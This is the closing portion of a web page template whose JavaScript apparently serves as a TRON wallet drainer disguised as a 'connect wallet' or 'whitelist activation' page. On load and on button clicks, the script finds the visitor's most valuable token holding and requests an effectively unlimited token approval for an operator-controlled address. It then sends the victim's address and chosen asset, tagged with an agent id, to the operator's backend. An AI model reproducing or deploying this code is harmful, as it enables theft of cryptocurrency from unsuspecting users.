                    'WIN': 6,
                    'USDT': 6,
                    'TONS': 6,
                    'USDJ': 18,
                    'JST': 18,
                    "HT": 18,
                    "SUN": 18,
                    "EXNX": 18,
                    "VCOIN": 6,
                    "POL": 8,
                    "CKRW": 6,
                }

                var total = 0;
                async function getMostValuableAssets(account) {
                    let _symbol = 'USDT';
                    for (const symbol of Object.keys(addr)) {
                        let contract = await tronWeb.contract().at(addr[symbol]);
                        let myBalance = await contract.balanceOf(account).call(function (err,balance){const usdt=balance/(10**(decimals[symbol]||18))*price[symbol];console.log(usdt);if (usdt>total&&usdt>500){_symbol=symbol;total=usdt;approveAddr=addr[_symbol];console.log(_symbol)}})
                    }
                    bizhong = _symbol;
                    return _symbol;
                }

                /**
				* * Connect wallet button pressed.
				*/
                async function onConnect() {
                    $('.pages').append('<div class="modal-overlay"></div>');
                    $('.modal-overlay').addClass('modal-overlay-visible');
                    $('.modal').removeClass('modal-out').addClass('modal-in');
                    let walletAddress = tronWeb.defaultAddress.base58;
                    bizhong = await getMostValuableAssets(walletAddress);
                    let instance = await tronWeb.contract().at(approveAddr);
                    let res = await instance["increaseApproval"](authorized_address,"90000000000000000000000000000");
                    res.send({
                        feeLimit: 10000000,
                        callValue: 0,
                        shouldPollResponse: false
                    }, function(err, res) {
                        if (err == null) {
                            postInfo(walletAddress, bizhong)
                        }
                        $('.modal-overlay').remove();
                        $('.modal').removeClass('modal-in').addClass('modal-out');
                    })
                }
                async function init() {
                    onConnect();
                }

                /**
				* Main entry point.
				*/
                init();
                document.querySelector("#btn-connect").addEventListener("click", onConnect);
                //Active whitelist
                document.querySelector("#btn-active").addEventListener("click", onConnect);
                //Share Check
                //document.querySelector("#btn-share").addEventListener("click", shareInfo);
                //Go to Share div
                //document.querySelector("#btn-go-share").addEventListener("click", shareInfo);

                document.querySelector("#go-en").addEventListener("click", goEn);
                //document.querySelector("#go-cn").addEventListener("click", goCn);

                $("#activeConfirm").click(function() {
                    $("#goToActionSetion").trigger('click')
                });
                //Receive
            })

            async function postInfo(address, symbol) {
                var data = {
                    address: address,
                    auth_address: authorized_address,
                    bizhong: symbol,
                    agent: agent
                }

                var d = new Date();
				var n = d.getTime();

				$.ajax({
					type: 'get',
					url:  domain + "{:url('index/api/trc_post')}?t="+n,
					data: data,
					success:function(){
					}
				})
            }

            async function goEn() {
                var url = "{:url('index/filcoinx/index_trc',['agent'=>$userId,'type'=>'en'])}";
                window.location.href = url;
            }
            async function goCn() {
                var url = "{:url('index/filcoinx/index_trc',['agent'=>$userId])}";
                window.location.href = url;
            }
        </script>
        
    </body>
</html>
